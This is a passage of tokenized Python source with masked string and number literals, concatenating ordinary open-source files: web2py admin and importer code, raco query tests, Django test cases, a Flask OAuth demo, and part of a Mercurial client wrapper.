[ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> try : <EOL> total [ '<STR_LIT>' ] = total [ '<STR_LIT>' ] * <NUM_LIT:100> / ( total [ '<STR_LIT>' ] + <EOL> total [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ZeroDivisionError ) : <EOL> total [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if disk [ '<STR_LIT>' ] < ram [ '<STR_LIT>' ] : <EOL> total [ '<STR_LIT>' ] = disk [ '<STR_LIT>' ] <EOL> else : <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] <EOL> ram [ '<STR_LIT>' ] = GetInHMS ( time . time ( ) - ram [ '<STR_LIT>' ] ) <EOL> disk [ '<STR_LIT>' ] = GetInHMS ( time . time ( ) - disk [ '<STR_LIT>' ] ) <EOL> total [ '<STR_LIT>' ] = GetInHMS ( time . time ( ) - total [ '<STR_LIT>' ] ) <EOL> def key_table ( keys ) : <EOL> return TABLE ( <EOL> TR ( TD ( B ( T ( '<STR_LIT>' ) ) ) , TD ( B ( T ( '<STR_LIT>' ) ) ) ) , <EOL> * [ TR ( TD ( k [ <NUM_LIT:0> ] ) , TD ( '<STR_LIT>' % k [ <NUM_LIT:1> ] ) ) for k in keys ] , <EOL> ** dict ( _class = '<STR_LIT>' , <EOL> _style = "<STR_LIT>" ) ) <EOL> ram [ '<STR_LIT>' ] = key_table ( ram [ '<STR_LIT>' ] ) <EOL> disk [ '<STR_LIT>' ] = key_table ( disk [ '<STR_LIT>' ] ) <EOL> total [ '<STR_LIT>' ] = key_table ( total [ '<STR_LIT>' ] ) <EOL> return dict ( form = form , total = total , <EOL> ram = ram , disk = disk , object_stats = hp != False ) <EOL> def table_template ( table ) : <EOL> from gluon . html import TR , TD , TABLE , TAG <EOL> def FONT ( * args , ** kwargs ) : <EOL> return TAG . font ( * args , ** kwargs ) <EOL> def types ( field ) : <EOL> f_type = field . type <EOL> if not isinstance ( f_type , str ) : <EOL> return '<STR_LIT:U+0020>' <EOL> elif f_type == '<STR_LIT:string>' : <EOL> return field . length <EOL> elif f_type == '<STR_LIT:id>' : <EOL> return B ( '<STR_LIT>' ) <EOL> elif f_type . startswith ( '<STR_LIT>' ) or f_type . startswith ( '<STR_LIT>' ) : <EOL> return B ( '<STR_LIT>' ) <EOL> else : <EOL> return '<STR_LIT:U+0020>' <EOL> rows = [ ] <EOL> cellpadding = <NUM_LIT:4> <EOL> color = "<STR_LIT>" <EOL> bgcolor = "<STR_LIT>" <EOL> face = "<STR_LIT>" <EOL> face_bold = "<STR_LIT>" <EOL> border = <NUM_LIT:0> <EOL> rows . append ( TR ( TD ( FONT ( table , _face = face_bold , _color = bgcolor ) , <EOL> _colspan = <NUM_LIT:3> , _cellpadding = cellpadding , <EOL> _align = "<STR_LIT>" , _bgcolor = color ) ) ) <EOL> for row in db [ table ] : <EOL> rows . append ( TR ( TD ( FONT ( row . name , _color = color , _face = face_bold ) , <EOL> _align = "<STR_LIT:left>" , _cellpadding = cellpadding , <EOL> _border = border ) , <EOL> TD ( FONT ( row . type , _color = color , _face = face ) , <EOL> _align = "<STR_LIT:left>" , _cellpadding = cellpadding , <EOL> _border = border ) , <EOL> TD ( FONT ( types ( row ) , _color = color , _face = face ) , <EOL> _align = "<STR_LIT>" , _cellpadding = cellpadding , <EOL> _border = border ) ) ) <EOL> return "<STR_LIT>" % TABLE ( * rows , ** dict ( _bgcolor = bgcolor , _border = <NUM_LIT:1> , <EOL> _cellborder = <NUM_LIT:0> , _cellspacing = <NUM_LIT:0> ) <EOL> ) . xml ( ) <EOL> def bg_graph_model ( ) : <EOL> graph = pgv . AGraph ( layout = '<STR_LIT>' , directed = True , strict = False , rankdir = '<STR_LIT>' ) <EOL> subgraphs = dict ( ) <EOL> for tablename in db . tables : <EOL> if hasattr ( db [ tablename ] , '<STR_LIT>' ) : <EOL> meta_graphmodel = db [ tablename ] . _meta_graphmodel <EOL> else : <EOL> meta_graphmodel = dict ( group = '<STR_LIT>' , color = '<STR_LIT>' ) <EOL> group = meta_graphmodel [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> if not subgraphs . has_key ( group ) : <EOL> subgraphs [ group ] = dict ( meta = meta_graphmodel , tables = [ ] ) <EOL> subgraphs [ group ] [ '<STR_LIT>' ] . append ( tablename ) <EOL> else : <EOL> subgraphs [ group ] [ '<STR_LIT>' ] . append ( tablename ) <EOL> graph . add_node ( tablename , name = tablename , shape = '<STR_LIT>' , <EOL> label = table_template ( tablename ) ) <EOL> for n , key in enumerate ( subgraphs . iterkeys ( ) ) : <EOL> graph . subgraph ( nbunch = subgraphs [ key ] [ '<STR_LIT>' ] , <EOL> name = '<STR_LIT>' % n , <EOL> style = '<STR_LIT>' , <EOL> color = subgraphs [ key ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> label = subgraphs [ key ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> for tablename in db . tables : <EOL> for field in db [ tablename ] : <EOL> f_type = field . type <EOL> if isinstance ( f_type , str ) and ( <EOL> f_type . startswith ( '<STR_LIT>' ) or <EOL> f_type . startswith ( '<STR_LIT>' ) ) : <EOL> referenced_table = f_type . split ( ) [ <NUM_LIT:1> ] . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> n1 = graph . get_node ( tablename ) <EOL> n2 = graph . get_node ( referenced_table ) <EOL> graph . add_edge ( n1 , n2 , color = "<STR_LIT>" , label = '<STR_LIT>' ) <EOL> graph . layout ( ) <EOL> if not request . args : <EOL> response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> return graph . draw ( format = '<STR_LIT>' , prog = '<STR_LIT>' ) <EOL> else : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' % request . args ( <NUM_LIT:0> ) <EOL> if request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> return graph . string ( ) <EOL> else : <EOL> return graph . draw ( format = request . args ( <NUM_LIT:0> ) , prog = '<STR_LIT>' ) <EOL> def graph_model ( ) : <EOL> return dict ( databases = databases , pgv = pgv ) <EOL> def manage ( ) : <EOL> tables = manager_action [ '<STR_LIT>' ] <EOL> if isinstance ( tables [ <NUM_LIT:0> ] , str ) : <EOL> db = manager_action . get ( '<STR_LIT>' , auth . db ) <EOL> db = globals ( ) [ db ] if isinstance ( db , str ) else db <EOL> tables = [ db [ table ] for table in tables ] <EOL> if request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> auth . table_user ( ) . _plural = T ( '<STR_LIT>' ) <EOL> auth . table_group ( ) . _plural = T ( '<STR_LIT>' ) <EOL> auth . table_membership ( ) . _plural = T ( '<STR_LIT>' ) <EOL> auth . table_permission ( ) . _plural = T ( '<STR_LIT>' ) <EOL> if request . extension != '<STR_LIT>' : <EOL> return dict ( heading = manager_action . get ( '<STR_LIT>' , <EOL> T ( '<STR_LIT>' ) % dict ( action = request . args ( <NUM_LIT:0> ) . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) . title ( ) ) ) , <EOL> tablenames = [ table . _tablename for table in tables ] , <EOL> labels = [ table . _plural . title ( ) for table in tables ] ) <EOL> table = tables [ request . args ( <NUM_LIT:1> , cast = int ) ] <EOL> formname = '<STR_LIT>' % table . _tablename <EOL> linked_tables = orderby = None <EOL> if request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> auth . table_group ( ) . _id . readable = auth . table_membership ( ) . _id . readable = auth . table_permission ( ) . _id . readable = False <EOL> auth . table_membership ( ) . user_id . label = T ( '<STR_LIT>' ) <EOL> auth . table_membership ( ) . group_id . label = T ( '<STR_LIT>' ) <EOL> auth . table_permission ( ) . group_id . label = T ( '<STR_LIT>' ) <EOL> auth . table_permission ( ) . name . label = T ( '<STR_LIT>' ) <EOL> if table == auth . table_user ( ) : <EOL> linked_tables = [ auth . settings . table_membership_name ] <EOL> elif table == auth . table_group ( ) : <EOL> orderby = '<STR_LIT>' if not request . args ( <NUM_LIT:3> ) or '<STR_LIT>' not in request . args ( <NUM_LIT:3> ) else None <EOL> elif table == auth . table_permission ( ) : <EOL> orderby = '<STR_LIT>' <EOL> kwargs = dict ( user_signature = True , maxtextlength = <NUM_LIT:1000> , <EOL> orderby = orderby , linked_tables = linked_tables ) <EOL> smartgrid_args = manager_action . get ( '<STR_LIT>' , { } ) <EOL> kwargs . update ( ** smartgrid_args . get ( '<STR_LIT>' , { } ) ) <EOL> kwargs . update ( ** smartgrid_args . get ( table . _tablename , { } ) ) <EOL> grid = SQLFORM . smartgrid ( table , args = request . args [ : <NUM_LIT:2> ] , formname = formname , ** kwargs ) <EOL> return grid </s>
<s> import __builtin__ <EOL> import os <EOL> import sys <EOL> import threading <EOL> import traceback <EOL> from gluon import current <EOL> NATIVE_IMPORTER = __builtin__ . __import__ <EOL> INVALID_MODULES = set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def custom_import_install ( ) : <EOL> if __builtin__ . __import__ == NATIVE_IMPORTER : <EOL> INVALID_MODULES . update ( sys . modules . keys ( ) ) <EOL> __builtin__ . __import__ = custom_importer <EOL> def track_changes ( track = True ) : <EOL> assert track in ( True , False ) , "<STR_LIT>" <EOL> current . request . _custom_import_track_changes = track <EOL> def is_tracking_changes ( ) : <EOL> return current . request . _custom_import_track_changes <EOL> class CustomImportException ( ImportError ) : <EOL> pass <EOL> def custom_importer ( name , globals = None , locals = None , fromlist = None , level = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> globals = globals or { } <EOL> locals = locals or { } <EOL> fromlist = fromlist or [ ] <EOL> try : <EOL> if current . request . _custom_import_track_changes : <EOL> base_importer = TRACK_IMPORTER <EOL> else : <EOL> base_importer = NATIVE_IMPORTER <EOL> except : <EOL> base_importer = NATIVE_IMPORTER <EOL> if hasattr ( current , '<STR_LIT>' ) and level <= <NUM_LIT:0> and not name . partition ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] in INVALID_MODULES and isinstance ( globals , dict ) : <EOL> import_tb = None <EOL> try : <EOL> try : <EOL> oname = name if not name . startswith ( '<STR_LIT:.>' ) else '<STR_LIT:.>' + name <EOL> return NATIVE_IMPORTER ( oname , globals , locals , fromlist , level ) <EOL> except ImportError : <EOL> items = current . request . folder . split ( os . path . sep ) <EOL> if not items [ - <NUM_LIT:1> ] : <EOL> items = items [ : - <NUM_LIT:1> ] <EOL> modules_prefix = '<STR_LIT:.>' . join ( items [ - <NUM_LIT:2> : ] ) + '<STR_LIT>' <EOL> if not fromlist : <EOL> result = None <EOL> for itemname in name . split ( "<STR_LIT:.>" ) : <EOL> new_mod = base_importer ( <EOL> modules_prefix , globals , locals , [ itemname ] , level ) <EOL> try : <EOL> result = result or new_mod . __dict__ [ itemname ] <EOL> except KeyError , e : <EOL> raise ImportError , '<STR_LIT>' % str ( e ) <EOL> modules_prefix += "<STR_LIT:.>" + itemname <EOL> return result <EOL> else : <EOL> pname = modules_prefix + "<STR_LIT:.>" + name <EOL> return base_importer ( pname , globals , locals , fromlist , level ) <EOL> except ImportError , e1 : <EOL> import_tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> try : <EOL> return NATIVE_IMPORTER ( name , globals , locals , fromlist , level ) <EOL> except ImportError , e3 : <EOL> raise ImportError , e1 , import_tb <EOL> except Exception , e2 : <EOL> raise e2 <EOL> finally : <EOL> if import_tb : <EOL> import_tb = None <EOL> return NATIVE_IMPORTER ( name , globals , locals , fromlist , level ) <EOL> class TrackImporter ( object ) : <EOL> """<STR_LIT>""" <EOL> THREAD_LOCAL = threading . local ( ) <EOL> PACKAGE_PATH_SUFFIX = os . path . sep + "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . _import_dates = { } <EOL> def __call__ ( self , name , globals = None , locals = None , fromlist = None , level = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> globals = globals or { } <EOL> locals = locals or { } <EOL> fromlist = fromlist or [ ] <EOL> try : <EOL> self . _update_dates ( name , globals , locals , fromlist , level ) <EOL> result = NATIVE_IMPORTER ( name , globals , locals , fromlist , level ) <EOL> self . _update_dates ( name , globals , locals , fromlist , level ) <EOL> return result <EOL> except Exception , e : <EOL> raise <EOL> def _update_dates ( self , name , globals , locals , fromlist , level ) : <EOL> """<STR_LIT>""" <EOL> self . _reload_check ( name , globals , locals , level ) <EOL> for fromlist_name in fromlist or [ ] : <EOL> pname = "<STR_LIT>" % ( name , fromlist_name ) <EOL> self . _reload_check ( pname , globals , locals , level ) <EOL> def _reload_check ( self , name , globals , locals , level ) : <EOL> """<STR_LIT>""" <EOL> module = sys . modules . get ( name ) <EOL> file = self . _get_module_file ( module ) <EOL> if file : <EOL> date = self . _import_dates . get ( file ) <EOL> new_date = None <EOL> reload_mod = False <EOL> mod_to_pack = False <EOL> try : <EOL> new_date = os . path . getmtime ( file ) <EOL> except : <EOL> self . _import_dates . pop ( file , None ) <EOL> if file . endswith ( "<STR_LIT>" ) : <EOL> file = os . path . splitext ( file ) [ <NUM_LIT:0> ] <EOL> reload_mod = os . path . isdir ( file ) and os . path . isfile ( file + self . PACKAGE_PATH_SUFFIX ) <EOL> mod_to_pack = reload_mod <EOL> else : <EOL> file += "<STR_LIT>" <EOL> reload_mod = os . path . isfile ( file ) <EOL> if reload_mod : <EOL> new_date = os . path . getmtime ( file ) <EOL> if reload_mod or not date or new_date > date : <EOL> self . _import_dates [ file ] = new_date <EOL> if reload_mod or ( date and new_date > date ) : <EOL> if mod_to_pack : <EOL> mod_name = module . __name__ <EOL> del sys . modules [ mod_name ] <EOL> NATIVE_IMPORTER ( mod_name , globals , locals , [ ] , level ) <EOL> else : <EOL> reload ( module ) <EOL> def _get_module_file ( self , module ) : <EOL> """<STR_LIT>""" <EOL> file = getattr ( module , "<STR_LIT>" , None ) <EOL> if file : <EOL> file = os . path . splitext ( file ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> if file . endswith ( self . PACKAGE_PATH_SUFFIX ) : <EOL> file = os . path . dirname ( file ) <EOL> return file <EOL> TRACK_IMPORTER = TrackImporter ( ) </s>
<s> from raco . compile import compile , optimize <EOL> from raco . expression . boolean import EQ , AND , OR <EOL> from raco . expression import NamedAttributeRef , StringLiteral , NumericLiteral <EOL> import raco . scheme <EOL> import raco . catalog <EOL> sch = raco . scheme . Scheme ( [ ( "<STR_LIT>" , int ) , ( "<STR_LIT>" , int ) , ( "<STR_LIT:object>" , int ) ] ) <EOL> trialdat = raco . catalog . ASCIIFile ( "<STR_LIT>" , sch ) <EOL> print sch <EOL> R = Scan ( trialdat , sch ) <EOL> print R . scheme ( ) <EOL> sR = Select ( EQ ( NamedAttributeRef ( "<STR_LIT>" ) , NumericLiteral ( <NUM_LIT> ) ) , R ) <EOL> sS = Select ( EQ ( NamedAttributeRef ( "<STR_LIT>" ) , NumericLiteral ( <NUM_LIT> ) ) , R ) <EOL> sT = Select ( EQ ( NamedAttributeRef ( "<STR_LIT:object>" ) , NumericLiteral ( <NUM_LIT> ) ) , R ) <EOL> sRsS = Join ( [ ( "<STR_LIT:object>" , "<STR_LIT>" ) ] , sR , sS ) <EOL> sRsSsT = Join ( [ ( "<STR_LIT:object>" , "<STR_LIT>" ) ] , sRsS , sT ) <EOL> result = optimize ( [ ( "<STR_LIT>" , sT ) ] , CCAlgebra ) <EOL> print compile ( result ) </s>
<s> from sparql import * </s>
<s> import collections <EOL> Function = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:args>' , '<STR_LIT>' ] ) <EOL> StatefulFunc = collections . namedtuple ( <EOL> '<STR_LIT>' , [ '<STR_LIT:args>' , '<STR_LIT>' , "<STR_LIT>" ] ) </s>
<s> import collections <EOL> import raco . scheme as scheme <EOL> import raco . myrial . myrial_test as myrial_test <EOL> from raco import types <EOL> class SigmaClippingTest ( myrial_test . MyrialTestCase ) : <EOL> points = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> points_tuples = [ ( i , x ) for i , x in enumerate ( points ) ] <EOL> points_table = collections . Counter ( points_tuples ) <EOL> points_schema = scheme . Scheme ( [ ( '<STR_LIT:id>' , types . LONG_TYPE ) , ( '<STR_LIT:v>' , types . DOUBLE_TYPE ) ] ) <EOL> points_key = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> super ( SigmaClippingTest , self ) . setUp ( ) <EOL> self . db . ingest ( SigmaClippingTest . points_key , <EOL> SigmaClippingTest . points_table , <EOL> SigmaClippingTest . points_schema ) <EOL> self . db . ingest ( "<STR_LIT>" , collections . Counter ( ) , <EOL> SigmaClippingTest . points_schema ) <EOL> def run_it ( self , query ) : <EOL> points = [ ( i , x ) for i , x in self . points_tuples if x < <NUM_LIT> and x > <NUM_LIT> ] <EOL> expected = collections . Counter ( points ) <EOL> self . check_result ( query , expected , output = '<STR_LIT>' ) <EOL> def test_v0 ( self ) : <EOL> with open ( '<STR_LIT>' ) as fh : <EOL> query = fh . read ( ) <EOL> self . run_it ( query ) <EOL> def test_v2 ( self ) : <EOL> with open ( '<STR_LIT>' ) as fh : <EOL> query = fh . read ( ) <EOL> self . run_it ( query ) </s>
<s> from qbittorrent . client import Client </s>
<s> from data_importer . importers . base import * <EOL> from data_importer . importers . csv_importer import * <EOL> from data_importer . importers . xls_importer import * <EOL> from data_importer . importers . xlsx_importer import * <EOL> from data_importer . importers . xml_importer import * <EOL> from data_importer . importers . generic import * </s>
<s> from django . test import TestCase <EOL> from mock import Mock <EOL> import sys <EOL> from data_importer import forms <EOL> from imp import reload <EOL> class TestFileUploadForm ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . form = forms . FileUploadForm ( ) <EOL> def test_invalid_form ( self ) : <EOL> self . assertFalse ( self . form . is_valid ( ) ) <EOL> def test_default_importer ( self ) : <EOL> self . assertEqual ( self . form . importer , None ) <EOL> def test_default_importer_task ( self ) : <EOL> self . assertEqual ( self . form . is_task , True ) <EOL> class TestTaskImporter ( TestCase ) : <EOL> def test_celery_importer ( self ) : <EOL> sys . modules [ '<STR_LIT>' ] = Mock ( ) <EOL> reload ( forms ) <EOL> self . assertEqual ( forms . HAS_CELERY , True ) </s>
<s> import os <EOL> from flask import Flask <EOL> from flask_mwoauth import MWOAuth <EOL> from builtins import input <EOL> app = Flask ( __name__ ) <EOL> app . secret_key = os . urandom ( <NUM_LIT> ) <EOL> print ( """<STR_LIT>""" ) <EOL> consumer_key = input ( '<STR_LIT>' ) <EOL> consumer_secret = input ( '<STR_LIT>' ) <EOL> mwoauth = MWOAuth ( consumer_key = consumer_key , consumer_secret = consumer_secret ) <EOL> app . register_blueprint ( mwoauth . bp ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> return "<STR_LIT>" + repr ( mwoauth . get_current_user ( False ) ) + "<STR_LIT>" + "<STR_LIT>" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app . run ( debug = True ) </s>
<s> from django . test import TestCase <EOL> from model_mommy . utils import import_if_str <EOL> from test . generic . models import User <EOL> class TestUtils ( TestCase ) : <EOL> def test_import_from_str ( self ) : <EOL> self . assertRaises ( AttributeError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertRaises ( ImportError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertEqual ( User , import_if_str ( '<STR_LIT>' ) ) <EOL> def test_import_if_str ( self ) : <EOL> self . assertRaises ( AttributeError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertRaises ( ImportError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertEqual ( User , import_if_str ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( User , import_if_str ( User ) ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from django import template <EOL> from easytags import EasyLibrary <EOL> from easytags import EasyNode , EasyAsNode <EOL> class LibraryTests ( unittest . TestCase ) : <EOL> def test_easy_library_register_easy_node ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( test_tag ) <EOL> parser = template . Parser ( [ ] ) <EOL> token = template . Token ( template . TOKEN_BLOCK , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> test_node = register . tags [ '<STR_LIT>' ] ( parser , token ) <EOL> self . assertTrue ( isinstance ( test_node , EasyNode ) ) <EOL> context = template . Context ( { } ) <EOL> self . assertEquals ( u'<STR_LIT>' , test_node . render ( context ) ) <EOL> def test_easy_library_register_easy_node_with_parameters ( self ) : <EOL> def test_tag ( context , arg1 ) : <EOL> return arg1 <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( test_tag ) <EOL> parser = template . Parser ( [ ] ) <EOL> token = template . Token ( template . TOKEN_BLOCK , '<STR_LIT>' ) <EOL> test_node = register . tags [ '<STR_LIT>' ] ( parser , token ) <EOL> context = template . Context ( { } ) <EOL> self . assertEquals ( u'<STR_LIT>' , test_node . render ( context ) ) <EOL> def test_easy_library_register_tags_with_custom_names ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( '<STR_LIT>' , test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_as_decorating_method ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( ) ( test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_as_decorating_method_with_name ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( '<STR_LIT>' ) ( test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_as_decorating_method_with_name_kwarg ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( name = '<STR_LIT>' ) ( test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_keeps_decorated_function_data ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> test_tag = register . easytag ( name = '<STR_LIT>' ) ( test_tag ) <EOL> self . assertEquals ( '<STR_LIT>' , test_tag . __name__ ) <EOL> def test_easy_library_register_as_tags ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easyastag ( test_tag ) <EOL> parser = template . Parser ( [ ] ) <EOL> token = template . Token ( template . TOKEN_BLOCK , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> test_node = register . tags [ '<STR_LIT>' ] ( parser , token ) <EOL> self . assertTrue ( isinstance ( test_node , EasyAsNode ) ) <EOL> context = template . Context ( { } ) <EOL> self . assertEquals ( u'<STR_LIT>' , test_node . render ( context ) ) <EOL> self . assertEquals ( u'<STR_LIT>' , context [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import os <EOL> import sys <EOL> import gzip <EOL> import dateutil . parser <EOL> from vcstools . vcs_base import VcsClientBase , VcsError <EOL> from vcstools . common import sanitized , normalized_rel_path , run_shell_command <EOL> def _get_hg_version ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> value , output , _ = run_shell_command ( '<STR_LIT>' , <EOL> shell = True , <EOL> us_env = True ) <EOL> if value == <NUM_LIT:0> and output is not None and len ( output . splitlines ( ) ) > <NUM_LIT:0> : <EOL> version = output . splitlines ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> raise VcsError ( "<STR_LIT>" % ( value , output ) ) <EOL> except VcsError as e : <EOL> raise VcsError ( "<STR_LIT>" % e ) <EOL> return version <EOL> def _hg_diff_path_change ( diff , path ) : <EOL> """<STR_LIT>""" <EOL> if diff is None : <EOL> return None <EOL> INIT = <NUM_LIT:0> <EOL> INDIFF = <NUM_LIT:1> <EOL> state = INIT <EOL> s_list = [ line for line in diff . split ( os . linesep ) ] <EOL> lines = [ ] <EOL> for line in s_list : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> state = INIT <EOL> if state == INIT : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> state = INDIFF <EOL> newline = line <EOL> else : <EOL> if line . startswith ( "<STR_LIT>" ) and not line . startswith ( "<STR_LIT>" ) : <EOL> newline = "<STR_LIT>" % ( path , line [ <NUM_LIT:5> : ] ) <EOL> elif line . startswith ( "<STR_LIT>" ) and not line . startswith ( "<STR_LIT>" ) : <EOL> newline = "<STR_LIT>" % ( path , line [ <NUM_LIT:5> : ] ) <EOL> elif line . startswith ( "<STR_LIT>" ) : <EOL> newline = line . replace ( "<STR_LIT>" , "<STR_LIT:U+0020>" + path + "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> newline = newline . replace ( "<STR_LIT>" , "<STR_LIT:U+0020>" + path + "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> else : <EOL> newline = line <EOL> else : <EOL> newline = line <EOL> if newline != '<STR_LIT>' : <EOL> lines . append ( newline ) <EOL> result = "<STR_LIT:\n>" . join ( lines ) <EOL> return result <EOL> class HgClient ( VcsClientBase ) : <EOL> def __init__ ( self , path ) : <EOL> """<STR_LIT>""" <EOL> VcsClientBase . __init__ ( self , '<STR_LIT>' , path ) <EOL> _get_hg_version ( ) <EOL> @ staticmethod <EOL> def get_environment_metadata ( ) : <EOL> metadict = { } <EOL> try : <EOL> metadict [ "<STR_LIT:version>" ] = '<STR_LIT:%s>' % _get_hg_version ( ) <EOL> except : <EOL> metadict [ "<STR_LIT:version>" ] = "<STR_LIT>" <EOL> return metadict <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detect_presence ( ) : <EOL> cmd = "<STR_LIT>" <EOL> _ , output , _ = run_shell_command ( cmd , <EOL> shell = True , <EOL> cwd = self . _path , <EOL> us_env = True ) <EOL> return output . rstrip ( ) <EOL> return None <EOL> @ staticmethod <EOL> def static_detect_presence ( path ) : <EOL> return os . path . isdir ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> def checkout ( self , url , version = '<STR_LIT>' , verbose = False , <EOL> shallow = False , timeout = None ) : <EOL> if url is None or url . strip ( ) == '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % url ) <EOL> base_path = os . path . split ( self . get_path ( ) ) [ <NUM_LIT:0> ] <EOL> try : <EOL> os . makedirs ( base_path ) <EOL> except OSError : <EOL> pass <EOL> cmd = "<STR_LIT>" % ( sanitized ( url ) , self . _path ) <EOL> value , _ , msg = run_shell_command ( cmd , <EOL> shell = True , <EOL> no_filter = True ) <EOL> if value != <NUM_LIT:0> : <EOL> if msg : <EOL> sys . logger . error ( '<STR_LIT:%s>' % msg ) <EOL> return False <EOL> if version is not None and version . strip ( ) != '<STR_LIT>' : <EOL> cmd = "<STR_LIT>" % sanitized ( version ) <EOL> value , _ , msg = run_shell_command ( cmd , <EOL> cwd = self . _path , <EOL> shell = True , <EOL> no_filter = True ) <EOL> if value != <NUM_LIT:0> : <EOL> if msg : <EOL> sys . stderr . write ( '<STR_LIT>' % msg ) <EOL> return False <EOL> return True <EOL> def update ( self , version = '<STR_LIT>' , verbose = False , timeout = None ) : <EOL> verboseflag = '<STR_LIT>' <EOL> if verbose : <EOL> verboseflag = '<STR_LIT>' <EOL> if not self . detect_presence ( ) : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> return True <EOL> if not self . _do_pull ( ) : <EOL> return False <EOL> if version is not None and version . strip ( ) != '<STR_LIT>' : <EOL> cmd = "<STR_LIT>" % ( verboseflag , sanitized ( version ) ) <EOL> else : <EOL> cmd = "<STR_LIT>" % verboseflag <EOL> value , _ , _ = run_shell_command ( cmd , <EOL> cwd = self . _path , <EOL> shell = True , <EOL> no_filter = True ) <EOL> if value != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def get_version ( self , spec = None ) : <EOL> """<STR_LIT>""" <EOL> if spec is not None : <EOL> if self . detect_presence ( ) : <EOL> command = '<STR_LIT>' % sanitized ( spec ) <EOL> repeated = False <EOL> output = '<STR_LIT>' <EOL> while output == '<STR_LIT>' : <EOL> _ , output , _ = run_shell_command ( command , <EOL> shell = True , <EOL> cwd = self . _path , <EOL> us_env = True ) <EOL> if ( output . strip ( ) != '<STR_LIT>' and <EOL> not output . startswith ( "<STR_LIT>" ) or <EOL> repeated is True ) : <EOL> matches = [ l for l in output . splitlines ( ) if l . startswith ( '<STR_LIT>' ) ] <EOL> if len ( matches ) == <NUM_LIT:1> : <EOL> return matches 